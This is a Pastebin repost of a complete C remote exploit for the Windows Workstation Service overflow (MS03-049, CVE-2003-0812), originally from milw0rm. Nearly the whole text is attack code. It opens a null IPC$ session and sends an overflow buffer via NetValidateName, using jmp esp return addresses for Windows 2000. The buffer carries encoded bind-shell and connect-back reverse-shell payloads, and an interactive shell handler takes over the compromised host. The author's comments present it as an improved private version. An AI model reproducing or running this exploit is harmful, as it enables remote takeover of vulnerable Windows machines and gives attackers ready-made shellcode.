API tools faq
paste
Advertisement
FlyFar

Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049) - CVE-2003-0812

FlyFar
Jan 30th, 2024
2,224
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 12.62 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.  *  Author: snooq
  3.  *  Date: 14 November 2003  
  4.  *
  5.  *  +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++
  6.  *
  7.  *  This is just slightly better than the one I posted to
  8.  *  packetstorm....
  9.  *
  10.  *  The public version will crash 'services.exe' immediately
  11.  *  while this one crash it only when u exit from shell....
  12.  *
  13.  *  I'm still trying to figure out a way to avoid the 'crash'
  14.  *  all together... any ideas????
  15.  *
  16.  *  Let me know if you hav trouble compiling this shit...
  17.  *  I hope this could be a good e.g for u to try Win32
  18.  *  exploitation..
  19.  *
  20.  *  This code is crappy... if u know of a better way of doing
  21.  *  things... pls tell me.......
  22.  *
  23.  *  Otherwise, if you guys r keen... I'll be more than happy
  24.  *  to go thru this in details wif u all... Meanwhile..enjoy!
  25.  *
  26.  *  +++++++++++++++++++++++++++++++++++++++++++++++++
  27.  */
  28.  
  29. #pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib")
  30. #pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib")
  31. #pragma comment (linker,"/NODEFAULTLIB:libcmt.lib")
  32. #pragma comment (linker,"/NODEFAULTLIB:libcd.lib")
  33. #pragma comment (lib,"ws2_32")
  34. #pragma comment (lib,"msvcrt")
  35. #pragma comment (lib,"mpr")
  36. #pragma warning (disable:4013)
  37.  
  38. #include <winsock2.h>
  39. #include <windows.h>
  40. #include <process.h>
  41. #include <stdlib.h>
  42. #include <stdio.h>
  43. #include <lm.h>
  44.  
  45. #define NOP 0x90
  46. #define PORT    24876
  47. #define KEY 0x99999999
  48.  
  49. #define ALIGN       1   // Between 0 ~ 3
  50. #define TARGET      1
  51. #define INTERVAL    3
  52. #define TIME_OUT    20
  53. #define PORT_OFFSET_1   198
  54. #define PORT_OFFSET_2   193
  55. #define IP_OFFSET   186
  56. #define SC_OFFSET   20  // Gap for some NOPs...
  57. #define RET_SIZE    2026    // Big enuff to take EIP... ;)
  58.  
  59. #define SC_SIZE_1   sizeof(bindport)
  60. #define SC_SIZE_2   sizeof(connback)
  61.  
  62. #define BSIZE   2600
  63. #define SSIZE   128
  64.  
  65. extern char getopt(int,char **,char*);
  66. extern char *optarg;
  67. static int alarm_fired=0;
  68.  
  69. HMODULE hMod;
  70. FARPROC fxn;
  71. HANDLE t1, t2;
  72.  
  73. char buff[BSIZE];
  74.  
  75. struct {
  76.     char *os;
  77.     long jmpesp;
  78.     char *dll;
  79. }
  80.  
  81. targets[] = {
  82.     {
  83.         "Window 2000 (en) SP4",
  84.         0x77e14c29,
  85.         "user32.dll 5.0.2195.6688"
  86.     },
  87.     {
  88.         "Window 2000 (en) SP1",
  89.         0x77e3cb4c,
  90.         "user32.dll 5.0.2195.1600"
  91.     },
  92.     {
  93.         "For debugging only",
  94.         0x41424344,
  95.         "dummy.dll 5.0.2195.1600"
  96.     }
  97. }, v;
  98.  
  99. /*
  100.  * HD Moore's shellcode..... ;)
  101.  */
  102.  
  103. char bindport[]=
  104.     "\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
  105.     "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
  106.     "\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f"
  107.     "\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65"
  108.     "\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a"
  109.     "\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10"
  110.     "\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85"
  111.     "\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0"
  112.     "\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f"
  113.     "\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17"
  114.     "\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66"
  115.     "\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8"
  116.     "\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc"
  117.     "\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18"
  118.     "\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f"
  119.     "\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5"
  120.     "\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0"
  121.     "\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66"
  122.     "\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce"
  123.     "\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81"
  124.     "\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65"
  125.     "\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5"
  126.     "\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85"
  127.     "\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4"
  128.     "\xc2\x5b\x91\x99";
  129.  
  130. char connback[]=
  131.     "\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
  132.     "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
  133.     "\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33"
  134.     "\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b"
  135.     "\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7"
  136.     "\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd"
  137.     "\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce"
  138.     "\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3"
  139.     "\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71"
  140.     "\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09"
  141.     "\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce"
  142.     "\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b"
  143.     "\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd"
  144.     "\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67"
  145.     "\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14"
  146.     "\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99"
  147.     "\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd"
  148.     "\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12"
  149.     "\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72"
  150.     "\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79"
  151.     "\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12"
  152.     "\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12"
  153.     "\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09";
  154.  
  155. void err_exit(char *s) {
  156.     printf("%s\n",s);
  157.     exit(0);
  158. }
  159.  
  160. /*
  161.  * Ripped from TESO code and modifed by ey4s for win32
  162.  * and... lamer quoted it wholesale here..... =p
  163.  */
  164.  
  165. void doshell(int sock) {
  166.     int l;
  167.     char buf[512];
  168.     struct timeval time;
  169.     unsigned long ul[2];
  170.  
  171.     time.tv_sec=1;
  172.     time.tv_usec=0;
  173.  
  174.     while (1) {
  175.         ul[0]=1;
  176.         ul[1]=sock;
  177.  
  178.         l=select(0,(fd_set *)&ul,NULL,NULL,&time);
  179.         if(l==1) {
  180.             l=recv(sock,buf,sizeof(buf),0);
  181.             if (l<=0) {
  182.                 err_exit("-> Connection closed...\n");
  183.             }
  184.             l=write(1,buf,l);
  185.             if (l<=0) {
  186.                 err_exit("-> Connection closed...\n");
  187.             }
  188.         }
  189.         else {
  190.             l=read(0,buf,sizeof(buf));
  191.             if (l<=0) {
  192.                 err_exit("-> Connection closed...\n");
  193.             }
  194.             l=send(sock,buf,l,0);
  195.             if (l<=0) {
  196.                 err_exit("-> Connection closed...\n");
  197.             }
  198.         }
  199.     }
  200. }
  201.  
  202. void changeip(char *ip) {
  203.     char *ptr;
  204.     ptr=connback+IP_OFFSET;
  205.     /* Assume Little-Endianess.... */
  206.     *((long *)ptr)=inet_addr(ip)^KEY;
  207. }
  208.  
  209. void changeport(char *code, int port, int offset) {
  210.     char *ptr;
  211.     ptr=code+offset;
  212.     port^=KEY;
  213.     /* Assume Little-Endianess.... */
  214.     *ptr++=(char)((port>>8)&0xff);
  215.     *ptr++=(char)(port&0xff);
  216. }
  217.  
  218. void banner() {
  219.     printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n");
  220. }
  221.  
  222. void usage(char *s) {
  223.     banner();
  224.     printf("Usage: %s [options]\n",s);
  225.     printf("\t-r\tSize of 'return addresses'\n");
  226.     printf("\t-a\tAlignment size [0~3]\n");
  227.     printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
  228.     printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
  229.     printf("\t-s\tShellcode offset from the return address\n");
  230.     printf("\t-h\tTarget's IP\n");
  231.     printf("\t-t\tTarget types. ( -H for more info )\n");
  232.     printf("\t-H\tShow list of possible targets\n");
  233.     printf("\t-l\tListening for shell connecting\n");
  234.     printf("\t\tback to port specified by '-p' switch\n");
  235.     printf("\t-i\tIP for shell to connect back\n");
  236.     printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
  237.     printf("\t-T\tTime out (in number of seconds)\n\n");
  238.     printf("\tNotes:\n\t======\n\t'-h' is mandatory\n");
  239.     printf("\t'-i' is mandatory if '-l' is specified\n\n");
  240.     exit(0);
  241. }
  242.  
  243. void showtargets() {
  244.     int i;
  245.     banner();
  246.     printf("Possible targets are:\n");
  247.     printf("=====================\n");
  248.     for (i=0;i<sizeof(targets)/sizeof(v);i++) {
  249.         printf("%d) %s",i+1,targets[i].os);
  250.         printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll);
  251.     }
  252.     exit(0);
  253. }
  254.  
  255. void sendstr(char *host) {
  256.  
  257.     WCHAR wStr[128];
  258.     char ipc[128], hStr[128];
  259.  
  260.     DWORD ret;
  261.     NETRESOURCE NET;
  262.  
  263.     hMod=LoadLibrary("netapi32.dll");
  264.     fxn=GetProcAddress(hMod,"NetValidateName");
  265.  
  266.     _snprintf(ipc,127,"\\\\%s\\ipc$",host);
  267.     _snprintf(hStr,127,"\\\\%s",host);
  268.     MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));
  269.  
  270.     NET.lpLocalName = NULL;
  271.     NET.lpProvider = NULL;
  272.     NET.dwType = RESOURCETYPE_ANY;
  273.     NET.lpRemoteName = (char*)&ipc;
  274.  
  275.     printf("-> Setting up $IPC session...(aka 'null session')\n");
  276.     ret=WNetAddConnection2(&NET,"","",0);
  277.  
  278.     if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
  279.     else printf("-> IPC$ session setup successfully...\n");
  280.  
  281.     printf("-> Sending exploit string...\n");
  282.  
  283.     ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);
  284.  
  285. }
  286.  
  287. VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
  288.     err_exit("-> I give up...dude.....");
  289. }
  290.  
  291. void setalarm(int timeout) {
  292.  
  293.     MSG msg = { 0, 0, 0, 0 };
  294.     SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);
  295.  
  296.     while(!alarm_fired) {
  297.         if (GetMessage(&msg, 0, 0, 0) ) {
  298.             if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
  299.             DispatchMessage(&msg);
  300.         }
  301.     }
  302.  
  303. }
  304.  
  305. void resetalarm() {
  306.     if (TerminateThread(t2,0)==0) {
  307.         err_exit("-> Failed to reset alarm...");
  308.     }
  309.     if (TerminateThread(t1,0)==0) {
  310.         err_exit("-> Failed to kill the 'sending' thread...");
  311.     }
  312. }
  313.  
  314. void do_send(char *host,int timeout) {
  315.     t1=(HANDLE)_beginthread(sendstr,0,host);
  316.     if (t1==0) { err_exit("-> Failed to send exploit string..."); }
  317.     t2=(HANDLE)_beginthread(setalarm,0,timeout);
  318.     if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
  319. }
  320.  
  321. int main(int argc, char *argv[]) {
  322.  
  323.     char opt;
  324.     char *host, *ptr, *ip="";
  325.     struct sockaddr_in sockadd;
  326.     int i, i_len, ok=0, mode=0, flag=0;
  327.     int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
  328.     int target=TARGET, scsize=SC_SIZE_1, port=PORT;
  329.     int timeout=TIME_OUT, interval=INTERVAL;
  330.     long retaddr;
  331.  
  332.     WSADATA wsd;
  333.     SOCKET s1, s2;
  334.  
  335.     if (argc<2) { usage(argv[0]); }
  336.  
  337.     while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
  338.         switch(opt) {
  339.             case 'a':
  340.             align=atoi(optarg);
  341.             break;
  342.  
  343.             case 'I':
  344.             interval=atoi(optarg);
  345.             break;
  346.  
  347.             case 'T':
  348.             timeout=atoi(optarg);
  349.             break;
  350.  
  351.             case 't':
  352.             target=atoi(optarg);
  353.             retaddr=targets[target-1].jmpesp;
  354.             break;
  355.  
  356.             case 'i':
  357.             ip=optarg;
  358.             changeip(ip);
  359.             break;
  360.  
  361.             case 'l':
  362.             mode=1;
  363.             scsize=SC_SIZE_2;
  364.             break;
  365.  
  366.             case 'r':
  367.             retsize=atoi(optarg);
  368.             break;
  369.  
  370.             case 's':
  371.             sc_offset=atoi(optarg);
  372.             break;
  373.            
  374.             case 'h':
  375.             ok=1;
  376.             host=optarg;
  377.             sockadd.sin_addr.s_addr=inet_addr(optarg);
  378.             break;
  379.  
  380.             case 'p':
  381.             port=atoi(optarg);
  382.             break;
  383.  
  384.             case 'H':
  385.             showtargets();
  386.             break;
  387.  
  388.             default:
  389.             usage(argv[0]);
  390.             break;
  391.         }
  392.     }
  393.  
  394.     if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }
  395.  
  396.     memset(buff,NOP,BSIZE);
  397.  
  398.     ptr=buff+align;
  399.     for(i=0;i<retsize;i+=4) {
  400.         *((long *)ptr)=retaddr;
  401.         ptr+=4;
  402.     }
  403.  
  404.     if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {
  405.         err_exit("-> WSAStartup error....");
  406.     }
  407.  
  408.     if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
  409.         err_exit("-> socket() error...");
  410.     }
  411.     sockadd.sin_family=AF_INET;
  412.     sockadd.sin_port=htons((SHORT)port);
  413.  
  414.     ptr=buff+retsize+sc_offset;
  415.  
  416.     if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'..");
  417.  
  418.     banner();
  419.  
  420.     if (mode) {
  421.  
  422.         printf("-> 'Listening' mode...( port: %d )\n",port);
  423.  
  424.         changeport(connback, port, PORT_OFFSET_2);
  425.         for(i=0;i<scsize;i++) { *ptr++=connback[i]; }
  426.  
  427.         do_send(host,timeout);
  428.         Sleep(1000);
  429.  
  430.         sockadd.sin_addr.s_addr=htonl(INADDR_ANY);
  431.         i_len=sizeof(sockadd);
  432.  
  433.         if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {
  434.             err_exit("-> bind() error");
  435.         }
  436.  
  437.         if (listen(s1,0)<0) {
  438.             err_exit("-> listen() error");
  439.         }
  440.  
  441.         printf("-> Waiting for connection...\n");
  442.  
  443.         s2=accept(s1,(struct sockaddr *)&sockadd,&i_len);
  444.  
  445.         if (s2<0) {
  446.             err_exit("-> accept() error");
  447.         }
  448.  
  449.         printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr));
  450.  
  451.         resetalarm();
  452.         doshell(s2);
  453.  
  454.     }
  455.     else {
  456.  
  457.         printf("-> 'Connecting' mode...\n",port);
  458.  
  459.         changeport(bindport, port, PORT_OFFSET_1);
  460.         for(i=0;i<scsize;i++) { *ptr++=bindport[i]; }
  461.  
  462.         do_send(host,timeout);
  463.         Sleep(1000);
  464.  
  465.         printf("-> Will try connecting to shell now....\n");
  466.  
  467.         i=0;  
  468.         while(!flag) {
  469.             Sleep(interval*1000);
  470.             if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {
  471.                 printf("-> Trial #%d....\n",i++);
  472.             }
  473.             else { flag=1; }
  474.         }
  475.  
  476.         printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port);
  477.  
  478.         resetalarm();
  479.         doshell(s1);
  480.  
  481.     }
  482.  
  483.     return 0;
  484.  
  485. }
  486.  
  487. // milw0rm.com [2003-11-14]
Tags: Exploit CVE Vulnerability remote
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!